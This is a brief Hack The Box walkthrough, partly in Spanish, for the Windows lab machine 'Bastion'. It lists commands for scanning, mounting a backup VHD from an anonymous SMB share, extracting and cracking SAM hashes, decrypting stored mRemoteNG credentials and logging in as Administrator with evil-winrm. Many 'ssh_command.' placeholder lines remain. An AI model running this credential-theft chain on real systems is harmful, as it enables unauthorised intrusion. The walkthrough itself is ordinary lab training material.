Cu3rv0x
Bastion

Bastion


HTB Windows

ssh_command.)

nmap -A -p- -oA secnotes 10.129.178.250 —min-rate=10000 —script=vuln —script-timeout=15 -v

nmap -sC -sV -O -p- -oA secnotes 10.129.178.250

nmap -sU -O -p- -oA secnotes-udp 10.129.178.250

nikto -h 10.129.178.250:80

ssh_command.

ssh_command.

ssh_command.

crackmapexec smb 10.129.1.39

ssh_command.

smbclient //10.129.1.39/Backups -N

ssh_command.

sudo mkdir /mnt/smb

mount -t cifs “//10.129.1.39/Backups” /mnt/smb

cd /mnt/smb

ssh_command.

tree

ssh_command.

sudo rmmod nbd

sudo modprobe nbd

ls /dev

ssh_command.

sudo qemu-nbd -r -c /dev/nbd0 “/mnt/smb/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd”

ssh_command.

sudo mount /mnt/vhd

sudo mkdir /mnt/vhd

sudo mount /dev/nbd0p1 /mnt/vhd

ssh_command.

No encontramos user.txt

ssh_command.

Nos dirigimos al directorio config

ssh_command.

Tratamos de hacer una copia del SAM

ssh_command.

crackmapexec smb bastion.htb -u ‘Administrator’ -H ‘31d6c…’

ssh_command.

crackmapexec smb bastion.htb -u ‘L4mpje’ -H ‘2611…’

ssh_command.

crackmapexec winrm bastion.htb -u ‘L4mpje’ -H ‘2611…’

ssh_command.

la contrasena bureaulampje

john —wordlist=/usr/share/wordlists/rockyou.txt hash —format=NT

ssh_command.

ssh L4mpje@bastion.htb

ssh_command.

whoami /priv

ssh_command.

whoami /all

ssh_command.

Vemos el mRemoteNG

cd C:\PROGRA~2

ssh_command.

cd C:\Users\L4mpje\AppData\Roaming\mRemoteNG

ssh_command.

type C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml

ssh_command.

git clone https://github.com/haseebT/mRemoteNG-Decrypt

python mremoteng_decrypt.py -s ‘aEWNFVS…’

Conseguimos las credenciales-> Administrator:thXLHM96BeKL0ER2

ssh_command.

crackmapexec smb bastion.htb -u ‘Administrator’ -p ‘thXLHM96BeKL0ER2’

ssh_command.

evil-winrm -i bastion.htb -u ‘Administrator’ -p ‘thXLHM96BeKL0ER2’

ssh_command.

ssh_command.

© 2025 Cu3rv0x